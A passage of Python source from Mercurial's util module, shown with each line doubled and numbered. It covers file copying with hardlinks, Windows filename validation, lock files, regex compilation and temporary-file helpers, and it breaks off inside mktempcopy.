1738 prop = pycompat.sysstr(prop)
1739 if prop in obj.__dict__:
1739 if prop in obj.__dict__:
1740 del obj.__dict__[prop]
1740 del obj.__dict__[prop]
1741
1741
1742
1742
1743 def increasingchunks(source, min=1024, max=65536):
1743 def increasingchunks(source, min=1024, max=65536):
1744 '''return no less than min bytes per chunk while data remains,
1744 '''return no less than min bytes per chunk while data remains,
1745 doubling min after each chunk until it reaches max'''
1745 doubling min after each chunk until it reaches max'''
1746
1746
1747 def log2(x):
1747 def log2(x):
1748 if not x:
1748 if not x:
1749 return 0
1749 return 0
1750 i = 0
1750 i = 0
1751 while x:
1751 while x:
1752 x >>= 1
1752 x >>= 1
1753 i += 1
1753 i += 1
1754 return i - 1
1754 return i - 1
1755
1755
1756 buf = []
1756 buf = []
1757 blen = 0
1757 blen = 0
1758 for chunk in source:
1758 for chunk in source:
1759 buf.append(chunk)
1759 buf.append(chunk)
1760 blen += len(chunk)
1760 blen += len(chunk)
1761 if blen >= min:
1761 if blen >= min:
1762 if min < max:
1762 if min < max:
1763 min = min << 1
1763 min = min << 1
1764 nmin = 1 << log2(blen)
1764 nmin = 1 << log2(blen)
1765 if nmin > min:
1765 if nmin > min:
1766 min = nmin
1766 min = nmin
1767 if min > max:
1767 if min > max:
1768 min = max
1768 min = max
1769 yield b''.join(buf)
1769 yield b''.join(buf)
1770 blen = 0
1770 blen = 0
1771 buf = []
1771 buf = []
1772 if buf:
1772 if buf:
1773 yield b''.join(buf)
1773 yield b''.join(buf)
1774
1774
1775
1775
1776 def always(fn):
1776 def always(fn):
1777 return True
1777 return True
1778
1778
1779
1779
1780 def never(fn):
1780 def never(fn):
1781 return False
1781 return False
1782
1782
1783
1783
1784 def nogc(func):
1784 def nogc(func):
1785 """disable garbage collector
1785 """disable garbage collector
1786
1786
1787 Python's garbage collector triggers a GC each time a certain number of
1787 Python's garbage collector triggers a GC each time a certain number of
1788 container objects (the number being defined by gc.get_threshold()) are
1788 container objects (the number being defined by gc.get_threshold()) are
1789 allocated even when marked not to be tracked by the collector. Tracking has
1789 allocated even when marked not to be tracked by the collector. Tracking has
1790 no effect on when GCs are triggered, only on what objects the GC looks
1790 no effect on when GCs are triggered, only on what objects the GC looks
1791 into. As a workaround, disable GC while building complex (huge)
1791 into. As a workaround, disable GC while building complex (huge)
1792 containers.
1792 containers.
1793
1793
1794 This garbage collector issue have been fixed in 2.7. But it still affect
1794 This garbage collector issue have been fixed in 2.7. But it still affect
1795 CPython's performance.
1795 CPython's performance.
1796 """
1796 """
1797
1797
1798 def wrapper(*args, **kwargs):
1798 def wrapper(*args, **kwargs):
1799 gcenabled = gc.isenabled()
1799 gcenabled = gc.isenabled()
1800 gc.disable()
1800 gc.disable()
1801 try:
1801 try:
1802 return func(*args, **kwargs)
1802 return func(*args, **kwargs)
1803 finally:
1803 finally:
1804 if gcenabled:
1804 if gcenabled:
1805 gc.enable()
1805 gc.enable()
1806
1806
1807 return wrapper
1807 return wrapper
1808
1808
1809
1809
1810 if pycompat.ispypy:
1810 if pycompat.ispypy:
1811 # PyPy runs slower with gc disabled
1811 # PyPy runs slower with gc disabled
1812 nogc = lambda x: x
1812 nogc = lambda x: x
1813
1813
1814
1814
1815 def pathto(root, n1, n2):
1815 def pathto(root, n1, n2):
1816 '''return the relative path from one place to another.
1816 '''return the relative path from one place to another.
1817 root should use os.sep to separate directories
1817 root should use os.sep to separate directories
1818 n1 should use os.sep to separate directories
1818 n1 should use os.sep to separate directories
1819 n2 should use "/" to separate directories
1819 n2 should use "/" to separate directories
1820 returns an os.sep-separated path.
1820 returns an os.sep-separated path.
1821
1821
1822 If n1 is a relative path, it's assumed it's
1822 If n1 is a relative path, it's assumed it's
1823 relative to root.
1823 relative to root.
1824 n2 should always be relative to root.
1824 n2 should always be relative to root.
1825 '''
1825 '''
1826 if not n1:
1826 if not n1:
1827 return localpath(n2)
1827 return localpath(n2)
1828 if os.path.isabs(n1):
1828 if os.path.isabs(n1):
1829 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1829 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1830 return os.path.join(root, localpath(n2))
1830 return os.path.join(root, localpath(n2))
1831 n2 = b'/'.join((pconvert(root), n2))
1831 n2 = b'/'.join((pconvert(root), n2))
1832 a, b = splitpath(n1), n2.split(b'/')
1832 a, b = splitpath(n1), n2.split(b'/')
1833 a.reverse()
1833 a.reverse()
1834 b.reverse()
1834 b.reverse()
1835 while a and b and a[-1] == b[-1]:
1835 while a and b and a[-1] == b[-1]:
1836 a.pop()
1836 a.pop()
1837 b.pop()
1837 b.pop()
1838 b.reverse()
1838 b.reverse()
1839 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1839 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1840
1840
1841
1841
1842 def checksignature(func):
1842 def checksignature(func):
1843 '''wrap a function with code to check for calling errors'''
1843 '''wrap a function with code to check for calling errors'''
1844
1844
1845 def check(*args, **kwargs):
1845 def check(*args, **kwargs):
1846 try:
1846 try:
1847 return func(*args, **kwargs)
1847 return func(*args, **kwargs)
1848 except TypeError:
1848 except TypeError:
1849 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1849 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1850 raise error.SignatureError
1850 raise error.SignatureError
1851 raise
1851 raise
1852
1852
1853 return check
1853 return check
1854
1854
1855
1855
1856 # a whilelist of known filesystems where hardlink works reliably
1856 # a whilelist of known filesystems where hardlink works reliably
1857 _hardlinkfswhitelist = {
1857 _hardlinkfswhitelist = {
1858 b'apfs',
1858 b'apfs',
1859 b'btrfs',
1859 b'btrfs',
1860 b'ext2',
1860 b'ext2',
1861 b'ext3',
1861 b'ext3',
1862 b'ext4',
1862 b'ext4',
1863 b'hfs',
1863 b'hfs',
1864 b'jfs',
1864 b'jfs',
1865 b'NTFS',
1865 b'NTFS',
1866 b'reiserfs',
1866 b'reiserfs',
1867 b'tmpfs',
1867 b'tmpfs',
1868 b'ufs',
1868 b'ufs',
1869 b'xfs',
1869 b'xfs',
1870 b'zfs',
1870 b'zfs',
1871 }
1871 }
1872
1872
1873
1873
1874 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1874 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1875 '''copy a file, preserving mode and optionally other stat info like
1875 '''copy a file, preserving mode and optionally other stat info like
1876 atime/mtime
1876 atime/mtime
1877
1877
1878 checkambig argument is used with filestat, and is useful only if
1878 checkambig argument is used with filestat, and is useful only if
1879 destination file is guarded by any lock (e.g. repo.lock or
1879 destination file is guarded by any lock (e.g. repo.lock or
1880 repo.wlock).
1880 repo.wlock).
1881
1881
1882 copystat and checkambig should be exclusive.
1882 copystat and checkambig should be exclusive.
1883 '''
1883 '''
1884 assert not (copystat and checkambig)
1884 assert not (copystat and checkambig)
1885 oldstat = None
1885 oldstat = None
1886 if os.path.lexists(dest):
1886 if os.path.lexists(dest):
1887 if checkambig:
1887 if checkambig:
1888 oldstat = checkambig and filestat.frompath(dest)
1888 oldstat = checkambig and filestat.frompath(dest)
1889 unlink(dest)
1889 unlink(dest)
1890 if hardlink:
1890 if hardlink:
1891 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1891 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1892 # unless we are confident that dest is on a whitelisted filesystem.
1892 # unless we are confident that dest is on a whitelisted filesystem.
1893 try:
1893 try:
1894 fstype = getfstype(os.path.dirname(dest))
1894 fstype = getfstype(os.path.dirname(dest))
1895 except OSError:
1895 except OSError:
1896 fstype = None
1896 fstype = None
1897 if fstype not in _hardlinkfswhitelist:
1897 if fstype not in _hardlinkfswhitelist:
1898 hardlink = False
1898 hardlink = False
1899 if hardlink:
1899 if hardlink:
1900 try:
1900 try:
1901 oslink(src, dest)
1901 oslink(src, dest)
1902 return
1902 return
1903 except (IOError, OSError):
1903 except (IOError, OSError):
1904 pass # fall back to normal copy
1904 pass # fall back to normal copy
1905 if os.path.islink(src):
1905 if os.path.islink(src):
1906 os.symlink(os.readlink(src), dest)
1906 os.symlink(os.readlink(src), dest)
1907 # copytime is ignored for symlinks, but in general copytime isn't needed
1907 # copytime is ignored for symlinks, but in general copytime isn't needed
1908 # for them anyway
1908 # for them anyway
1909 else:
1909 else:
1910 try:
1910 try:
1911 shutil.copyfile(src, dest)
1911 shutil.copyfile(src, dest)
1912 if copystat:
1912 if copystat:
1913 # copystat also copies mode
1913 # copystat also copies mode
1914 shutil.copystat(src, dest)
1914 shutil.copystat(src, dest)
1915 else:
1915 else:
1916 shutil.copymode(src, dest)
1916 shutil.copymode(src, dest)
1917 if oldstat and oldstat.stat:
1917 if oldstat and oldstat.stat:
1918 newstat = filestat.frompath(dest)
1918 newstat = filestat.frompath(dest)
1919 if newstat.isambig(oldstat):
1919 if newstat.isambig(oldstat):
1920 # stat of copied file is ambiguous to original one
1920 # stat of copied file is ambiguous to original one
1921 advanced = (
1921 advanced = (
1922 oldstat.stat[stat.ST_MTIME] + 1
1922 oldstat.stat[stat.ST_MTIME] + 1
1923 ) & 0x7FFFFFFF
1923 ) & 0x7FFFFFFF
1924 os.utime(dest, (advanced, advanced))
1924 os.utime(dest, (advanced, advanced))
1925 except shutil.Error as inst:
1925 except shutil.Error as inst:
1926 raise error.Abort(stringutil.forcebytestr(inst))
1926 raise error.Abort(stringutil.forcebytestr(inst))
1927
1927
1928
1928
1929 def copyfiles(src, dst, hardlink=None, progress=None):
1929 def copyfiles(src, dst, hardlink=None, progress=None):
1930 """Copy a directory tree using hardlinks if possible."""
1930 """Copy a directory tree using hardlinks if possible."""
1931 num = 0
1931 num = 0
1932
1932
1933 def settopic():
1933 def settopic():
1934 if progress:
1934 if progress:
1935 progress.topic = _(b'linking') if hardlink else _(b'copying')
1935 progress.topic = _(b'linking') if hardlink else _(b'copying')
1936
1936
1937 if os.path.isdir(src):
1937 if os.path.isdir(src):
1938 if hardlink is None:
1938 if hardlink is None:
1939 hardlink = (
1939 hardlink = (
1940 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1940 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1941 )
1941 )
1942 settopic()
1942 settopic()
1943 os.mkdir(dst)
1943 os.mkdir(dst)
1944 for name, kind in listdir(src):
1944 for name, kind in listdir(src):
1945 srcname = os.path.join(src, name)
1945 srcname = os.path.join(src, name)
1946 dstname = os.path.join(dst, name)
1946 dstname = os.path.join(dst, name)
1947 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1947 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1948 num += n
1948 num += n
1949 else:
1949 else:
1950 if hardlink is None:
1950 if hardlink is None:
1951 hardlink = (
1951 hardlink = (
1952 os.stat(os.path.dirname(src)).st_dev
1952 os.stat(os.path.dirname(src)).st_dev
1953 == os.stat(os.path.dirname(dst)).st_dev
1953 == os.stat(os.path.dirname(dst)).st_dev
1954 )
1954 )
1955 settopic()
1955 settopic()
1956
1956
1957 if hardlink:
1957 if hardlink:
1958 try:
1958 try:
1959 oslink(src, dst)
1959 oslink(src, dst)
1960 except (IOError, OSError):
1960 except (IOError, OSError):
1961 hardlink = False
1961 hardlink = False
1962 shutil.copy(src, dst)
1962 shutil.copy(src, dst)
1963 else:
1963 else:
1964 shutil.copy(src, dst)
1964 shutil.copy(src, dst)
1965 num += 1
1965 num += 1
1966 if progress:
1966 if progress:
1967 progress.increment()
1967 progress.increment()
1968
1968
1969 return hardlink, num
1969 return hardlink, num
1970
1970
1971
1971
1972 _winreservednames = {
1972 _winreservednames = {
1973 b'con',
1973 b'con',
1974 b'prn',
1974 b'prn',
1975 b'aux',
1975 b'aux',
1976 b'nul',
1976 b'nul',
1977 b'com1',
1977 b'com1',
1978 b'com2',
1978 b'com2',
1979 b'com3',
1979 b'com3',
1980 b'com4',
1980 b'com4',
1981 b'com5',
1981 b'com5',
1982 b'com6',
1982 b'com6',
1983 b'com7',
1983 b'com7',
1984 b'com8',
1984 b'com8',
1985 b'com9',
1985 b'com9',
1986 b'lpt1',
1986 b'lpt1',
1987 b'lpt2',
1987 b'lpt2',
1988 b'lpt3',
1988 b'lpt3',
1989 b'lpt4',
1989 b'lpt4',
1990 b'lpt5',
1990 b'lpt5',
1991 b'lpt6',
1991 b'lpt6',
1992 b'lpt7',
1992 b'lpt7',
1993 b'lpt8',
1993 b'lpt8',
1994 b'lpt9',
1994 b'lpt9',
1995 }
1995 }
1996 _winreservedchars = b':*?"<>|'
1996 _winreservedchars = b':*?"<>|'
1997
1997
1998
1998
1999 def checkwinfilename(path):
1999 def checkwinfilename(path):
2000 r'''Check that the base-relative path is a valid filename on Windows.
2000 r'''Check that the base-relative path is a valid filename on Windows.
2001 Returns None if the path is ok, or a UI string describing the problem.
2001 Returns None if the path is ok, or a UI string describing the problem.
2002
2002
2003 >>> checkwinfilename(b"just/a/normal/path")
2003 >>> checkwinfilename(b"just/a/normal/path")
2004 >>> checkwinfilename(b"foo/bar/con.xml")
2004 >>> checkwinfilename(b"foo/bar/con.xml")
2005 "filename contains 'con', which is reserved on Windows"
2005 "filename contains 'con', which is reserved on Windows"
2006 >>> checkwinfilename(b"foo/con.xml/bar")
2006 >>> checkwinfilename(b"foo/con.xml/bar")
2007 "filename contains 'con', which is reserved on Windows"
2007 "filename contains 'con', which is reserved on Windows"
2008 >>> checkwinfilename(b"foo/bar/xml.con")
2008 >>> checkwinfilename(b"foo/bar/xml.con")
2009 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2009 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2010 "filename contains 'AUX', which is reserved on Windows"
2010 "filename contains 'AUX', which is reserved on Windows"
2011 >>> checkwinfilename(b"foo/bar/bla:.txt")
2011 >>> checkwinfilename(b"foo/bar/bla:.txt")
2012 "filename contains ':', which is reserved on Windows"
2012 "filename contains ':', which is reserved on Windows"
2013 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2013 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2014 "filename contains '\\x07', which is invalid on Windows"
2014 "filename contains '\\x07', which is invalid on Windows"
2015 >>> checkwinfilename(b"foo/bar/bla ")
2015 >>> checkwinfilename(b"foo/bar/bla ")
2016 "filename ends with ' ', which is not allowed on Windows"
2016 "filename ends with ' ', which is not allowed on Windows"
2017 >>> checkwinfilename(b"../bar")
2017 >>> checkwinfilename(b"../bar")
2018 >>> checkwinfilename(b"foo\\")
2018 >>> checkwinfilename(b"foo\\")
2019 "filename ends with '\\', which is invalid on Windows"
2019 "filename ends with '\\', which is invalid on Windows"
2020 >>> checkwinfilename(b"foo\\/bar")
2020 >>> checkwinfilename(b"foo\\/bar")
2021 "directory name ends with '\\', which is invalid on Windows"
2021 "directory name ends with '\\', which is invalid on Windows"
2022 '''
2022 '''
2023 if path.endswith(b'\\'):
2023 if path.endswith(b'\\'):
2024 return _(b"filename ends with '\\', which is invalid on Windows")
2024 return _(b"filename ends with '\\', which is invalid on Windows")
2025 if b'\\/' in path:
2025 if b'\\/' in path:
2026 return _(b"directory name ends with '\\', which is invalid on Windows")
2026 return _(b"directory name ends with '\\', which is invalid on Windows")
2027 for n in path.replace(b'\\', b'/').split(b'/'):
2027 for n in path.replace(b'\\', b'/').split(b'/'):
2028 if not n:
2028 if not n:
2029 continue
2029 continue
2030 for c in _filenamebytestr(n):
2030 for c in _filenamebytestr(n):
2031 if c in _winreservedchars:
2031 if c in _winreservedchars:
2032 return (
2032 return (
2033 _(
2033 _(
2034 b"filename contains '%s', which is reserved "
2034 b"filename contains '%s', which is reserved "
2035 b"on Windows"
2035 b"on Windows"
2036 )
2036 )
2037 % c
2037 % c
2038 )
2038 )
2039 if ord(c) <= 31:
2039 if ord(c) <= 31:
2040 return _(
2040 return _(
2041 b"filename contains '%s', which is invalid on Windows"
2041 b"filename contains '%s', which is invalid on Windows"
2042 ) % stringutil.escapestr(c)
2042 ) % stringutil.escapestr(c)
2043 base = n.split(b'.')[0]
2043 base = n.split(b'.')[0]
2044 if base and base.lower() in _winreservednames:
2044 if base and base.lower() in _winreservednames:
2045 return (
2045 return (
2046 _(b"filename contains '%s', which is reserved on Windows")
2046 _(b"filename contains '%s', which is reserved on Windows")
2047 % base
2047 % base
2048 )
2048 )
2049 t = n[-1:]
2049 t = n[-1:]
2050 if t in b'. ' and n not in b'..':
2050 if t in b'. ' and n not in b'..':
2051 return (
2051 return (
2052 _(
2052 _(
2053 b"filename ends with '%s', which is not allowed "
2053 b"filename ends with '%s', which is not allowed "
2054 b"on Windows"
2054 b"on Windows"
2055 )
2055 )
2056 % t
2056 % t
2057 )
2057 )
2058
2058
2059
2059
2060 timer = getattr(time, "perf_counter", None)
2060 timer = getattr(time, "perf_counter", None)
2061
2061
2062 if pycompat.iswindows:
2062 if pycompat.iswindows:
2063 checkosfilename = checkwinfilename
2063 checkosfilename = checkwinfilename
2064 if not timer:
2064 if not timer:
2065 timer = time.clock
2065 timer = time.clock
2066 else:
2066 else:
2067 # mercurial.windows doesn't have platform.checkosfilename
2067 # mercurial.windows doesn't have platform.checkosfilename
2068 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2068 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2069 if not timer:
2069 if not timer:
2070 timer = time.time
2070 timer = time.time
2071
2071
2072
2072
2073 def makelock(info, pathname):
2073 def makelock(info, pathname):
2074 """Create a lock file atomically if possible
2074 """Create a lock file atomically if possible
2075
2075
2076 This may leave a stale lock file if symlink isn't supported and signal
2076 This may leave a stale lock file if symlink isn't supported and signal
2077 interrupt is enabled.
2077 interrupt is enabled.
2078 """
2078 """
2079 try:
2079 try:
2080 return os.symlink(info, pathname)
2080 return os.symlink(info, pathname)
2081 except OSError as why:
2081 except OSError as why:
2082 if why.errno == errno.EEXIST:
2082 if why.errno == errno.EEXIST:
2083 raise
2083 raise
2084 except AttributeError: # no symlink in os
2084 except AttributeError: # no symlink in os
2085 pass
2085 pass
2086
2086
2087 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2087 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2088 ld = os.open(pathname, flags)
2088 ld = os.open(pathname, flags)
2089 os.write(ld, info)
2089 os.write(ld, info)
2090 os.close(ld)
2090 os.close(ld)
2091
2091
2092
2092
2093 def readlock(pathname):
2093 def readlock(pathname):
2094 try:
2094 try:
2095 return readlink(pathname)
2095 return readlink(pathname)
2096 except OSError as why:
2096 except OSError as why:
2097 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2097 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2098 raise
2098 raise
2099 except AttributeError: # no symlink in os
2099 except AttributeError: # no symlink in os
2100 pass
2100 pass
2101 with posixfile(pathname, b'rb') as fp:
2101 with posixfile(pathname, b'rb') as fp:
2102 return fp.read()
2102 return fp.read()
2103
2103
2104
2104
2105 def fstat(fp):
2105 def fstat(fp):
2106 '''stat file object that may not have fileno method.'''
2106 '''stat file object that may not have fileno method.'''
2107 try:
2107 try:
2108 return os.fstat(fp.fileno())
2108 return os.fstat(fp.fileno())
2109 except AttributeError:
2109 except AttributeError:
2110 return os.stat(fp.name)
2110 return os.stat(fp.name)
2111
2111
2112
2112
2113 # File system features
2113 # File system features
2114
2114
2115
2115
2116 def fscasesensitive(path):
2116 def fscasesensitive(path):
2117 """
2117 """
2118 Return true if the given path is on a case-sensitive filesystem
2118 Return true if the given path is on a case-sensitive filesystem
2119
2119
2120 Requires a path (like /foo/.hg) ending with a foldable final
2120 Requires a path (like /foo/.hg) ending with a foldable final
2121 directory component.
2121 directory component.
2122 """
2122 """
2123 s1 = os.lstat(path)
2123 s1 = os.lstat(path)
2124 d, b = os.path.split(path)
2124 d, b = os.path.split(path)
2125 b2 = b.upper()
2125 b2 = b.upper()
2126 if b == b2:
2126 if b == b2:
2127 b2 = b.lower()
2127 b2 = b.lower()
2128 if b == b2:
2128 if b == b2:
2129 return True # no evidence against case sensitivity
2129 return True # no evidence against case sensitivity
2130 p2 = os.path.join(d, b2)
2130 p2 = os.path.join(d, b2)
2131 try:
2131 try:
2132 s2 = os.lstat(p2)
2132 s2 = os.lstat(p2)
2133 if s2 == s1:
2133 if s2 == s1:
2134 return False
2134 return False
2135 return True
2135 return True
2136 except OSError:
2136 except OSError:
2137 return True
2137 return True
2138
2138
2139
2139
2140 try:
2140 try:
2141 import re2 # pytype: disable=import-error
2141 import re2 # pytype: disable=import-error
2142
2142
2143 _re2 = None
2143 _re2 = None
2144 except ImportError:
2144 except ImportError:
2145 _re2 = False
2145 _re2 = False
2146
2146
2147
2147
2148 class _re(object):
2148 class _re(object):
2149 def _checkre2(self):
2149 def _checkre2(self):
2150 global _re2
2150 global _re2
2151 try:
2151 try:
2152 # check if match works, see issue3964
2152 # check if match works, see issue3964
2153 _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]'))
2153 _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]'))
2154 except ImportError:
2154 except ImportError:
2155 _re2 = False
2155 _re2 = False
2156
2156
2157 def compile(self, pat, flags=0):
2157 def compile(self, pat, flags=0):
2158 '''Compile a regular expression, using re2 if possible
2158 '''Compile a regular expression, using re2 if possible
2159
2159
2160 For best performance, use only re2-compatible regexp features. The
2160 For best performance, use only re2-compatible regexp features. The
2161 only flags from the re module that are re2-compatible are
2161 only flags from the re module that are re2-compatible are
2162 IGNORECASE and MULTILINE.'''
2162 IGNORECASE and MULTILINE.'''
2163 if _re2 is None:
2163 if _re2 is None:
2164 self._checkre2()
2164 self._checkre2()
2165 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2165 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2166 if flags & remod.IGNORECASE:
2166 if flags & remod.IGNORECASE:
2167 pat = b'(?i)' + pat
2167 pat = b'(?i)' + pat
2168 if flags & remod.MULTILINE:
2168 if flags & remod.MULTILINE:
2169 pat = b'(?m)' + pat
2169 pat = b'(?m)' + pat
2170 try:
2170 try:
2171 return re2.compile(pat)
2171 return re2.compile(pat)
2172 except re2.error:
2172 except re2.error:
2173 pass
2173 pass
2174 return remod.compile(pat, flags)
2174 return remod.compile(pat, flags)
2175
2175
2176 @propertycache
2176 @propertycache
2177 def escape(self):
2177 def escape(self):
2178 '''Return the version of escape corresponding to self.compile.
2178 '''Return the version of escape corresponding to self.compile.
2179
2179
2180 This is imperfect because whether re2 or re is used for a particular
2180 This is imperfect because whether re2 or re is used for a particular
2181 function depends on the flags, etc, but it's the best we can do.
2181 function depends on the flags, etc, but it's the best we can do.
2182 '''
2182 '''
2183 global _re2
2183 global _re2
2184 if _re2 is None:
2184 if _re2 is None:
2185 self._checkre2()
2185 self._checkre2()
2186 if _re2:
2186 if _re2:
2187 return re2.escape
2187 return re2.escape
2188 else:
2188 else:
2189 return remod.escape
2189 return remod.escape
2190
2190
2191
2191
2192 re = _re()
2192 re = _re()
2193
2193
2194 _fspathcache = {}
2194 _fspathcache = {}
2195
2195
2196
2196
2197 def fspath(name, root):
2197 def fspath(name, root):
2198 '''Get name in the case stored in the filesystem
2198 '''Get name in the case stored in the filesystem
2199
2199
2200 The name should be relative to root, and be normcase-ed for efficiency.
2200 The name should be relative to root, and be normcase-ed for efficiency.
2201
2201
2202 Note that this function is unnecessary, and should not be
2202 Note that this function is unnecessary, and should not be
2203 called, for case-sensitive filesystems (simply because it's expensive).
2203 called, for case-sensitive filesystems (simply because it's expensive).
2204
2204
2205 The root should be normcase-ed, too.
2205 The root should be normcase-ed, too.
2206 '''
2206 '''
2207
2207
2208 def _makefspathcacheentry(dir):
2208 def _makefspathcacheentry(dir):
2209 return dict((normcase(n), n) for n in os.listdir(dir))
2209 return dict((normcase(n), n) for n in os.listdir(dir))
2210
2210
2211 seps = pycompat.ossep
2211 seps = pycompat.ossep
2212 if pycompat.osaltsep:
2212 if pycompat.osaltsep:
2213 seps = seps + pycompat.osaltsep
2213 seps = seps + pycompat.osaltsep
2214 # Protect backslashes. This gets silly very quickly.
2214 # Protect backslashes. This gets silly very quickly.
2215 seps.replace(b'\\', b'\\\\')
2215 seps.replace(b'\\', b'\\\\')
2216 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2216 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2217 dir = os.path.normpath(root)
2217 dir = os.path.normpath(root)
2218 result = []
2218 result = []
2219 for part, sep in pattern.findall(name):
2219 for part, sep in pattern.findall(name):
2220 if sep:
2220 if sep:
2221 result.append(sep)
2221 result.append(sep)
2222 continue
2222 continue
2223
2223
2224 if dir not in _fspathcache:
2224 if dir not in _fspathcache:
2225 _fspathcache[dir] = _makefspathcacheentry(dir)
2225 _fspathcache[dir] = _makefspathcacheentry(dir)
2226 contents = _fspathcache[dir]
2226 contents = _fspathcache[dir]
2227
2227
2228 found = contents.get(part)
2228 found = contents.get(part)
2229 if not found:
2229 if not found:
2230 # retry "once per directory" per "dirstate.walk" which
2230 # retry "once per directory" per "dirstate.walk" which
2231 # may take place for each patches of "hg qpush", for example
2231 # may take place for each patches of "hg qpush", for example
2232 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2232 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2233 found = contents.get(part)
2233 found = contents.get(part)
2234
2234
2235 result.append(found or part)
2235 result.append(found or part)
2236 dir = os.path.join(dir, part)
2236 dir = os.path.join(dir, part)
2237
2237
2238 return b''.join(result)
2238 return b''.join(result)
2239
2239
2240
2240
2241 def checknlink(testfile):
2241 def checknlink(testfile):
2242 '''check whether hardlink count reporting works properly'''
2242 '''check whether hardlink count reporting works properly'''
2243
2243
2244 # testfile may be open, so we need a separate file for checking to
2244 # testfile may be open, so we need a separate file for checking to
2245 # work around issue2543 (or testfile may get lost on Samba shares)
2245 # work around issue2543 (or testfile may get lost on Samba shares)
2246 f1, f2, fp = None, None, None
2246 f1, f2, fp = None, None, None
2247 try:
2247 try:
2248 fd, f1 = pycompat.mkstemp(
2248 fd, f1 = pycompat.mkstemp(
2249 prefix=b'.%s-' % os.path.basename(testfile),
2249 prefix=b'.%s-' % os.path.basename(testfile),
2250 suffix=b'1~',
2250 suffix=b'1~',
2251 dir=os.path.dirname(testfile),
2251 dir=os.path.dirname(testfile),
2252 )
2252 )
2253 os.close(fd)
2253 os.close(fd)
2254 f2 = b'%s2~' % f1[:-2]
2254 f2 = b'%s2~' % f1[:-2]
2255
2255
2256 oslink(f1, f2)
2256 oslink(f1, f2)
2257 # nlinks() may behave differently for files on Windows shares if
2257 # nlinks() may behave differently for files on Windows shares if
2258 # the file is open.
2258 # the file is open.
2259 fp = posixfile(f2)
2259 fp = posixfile(f2)
2260 return nlinks(f2) > 1
2260 return nlinks(f2) > 1
2261 except OSError:
2261 except OSError:
2262 return False
2262 return False
2263 finally:
2263 finally:
2264 if fp is not None:
2264 if fp is not None:
2265 fp.close()
2265 fp.close()
2266 for f in (f1, f2):
2266 for f in (f1, f2):
2267 try:
2267 try:
2268 if f is not None:
2268 if f is not None:
2269 os.unlink(f)
2269 os.unlink(f)
2270 except OSError:
2270 except OSError:
2271 pass
2271 pass
2272
2272
2273
2273
2274 def endswithsep(path):
2274 def endswithsep(path):
2275 '''Check path ends with os.sep or os.altsep.'''
2275 '''Check path ends with os.sep or os.altsep.'''
2276 return (
2276 return (
2277 path.endswith(pycompat.ossep)
2277 path.endswith(pycompat.ossep)
2278 or pycompat.osaltsep
2278 or pycompat.osaltsep
2279 and path.endswith(pycompat.osaltsep)
2279 and path.endswith(pycompat.osaltsep)
2280 )
2280 )
2281
2281
2282
2282
2283 def splitpath(path):
2283 def splitpath(path):
2284 '''Split path by os.sep.
2284 '''Split path by os.sep.
2285 Note that this function does not use os.altsep because this is
2285 Note that this function does not use os.altsep because this is
2286 an alternative of simple "xxx.split(os.sep)".
2286 an alternative of simple "xxx.split(os.sep)".
2287 It is recommended to use os.path.normpath() before using this
2287 It is recommended to use os.path.normpath() before using this
2288 function if need.'''
2288 function if need.'''
2289 return path.split(pycompat.ossep)
2289 return path.split(pycompat.ossep)
2290
2290
2291
2291
2292 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2292 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2293 """Create a temporary file with the same contents from name
2293 """Create a temporary file with the same contents from name
2294
2294
2295 The permission bits are copied from the original file.
2295 The permission bits are copied from the original file.
2296
2296
2297 If the temporary file is going to be truncated immediately, you
2297 If the temporary file is going to be truncated immediately, you
2298 can use emptyok=True as an optimization.
2298 can use emptyok=True as an optimization.
2299
2299
2300 Returns the name of the temporary file.
2300 Returns the name of the temporary file.
2301 """
2301 """
2302 d, fn = os.path.split(name)
2302 d, fn = os.path.split(name)
2303 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2303 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2304 os.close(fd)
2304 os.close(fd)
2305 # Temporary files are created with mode 0600, which is usually not
2305 # Temporary files are created with mode 0600, which is usually not
2306 # what we want. If the original file already exists, just copy
2306 # what we want. If the original file already exists, just copy
2307 # its mode. Otherwise, manually obey umask.
2307 # its mode. Otherwise, manually obey umask.
2308 copymode(name, temp, createmode, enforcewritable)
2308 copymode(name, temp, createmode, enforcewritable)
2309
2309
2310 if emptyok:
2310 if emptyok:
2311 return temp
2311 return temp
2312 try:
2312 try:
2313 try:
2313 try:
2314 ifp = posixfile(name, b"rb")
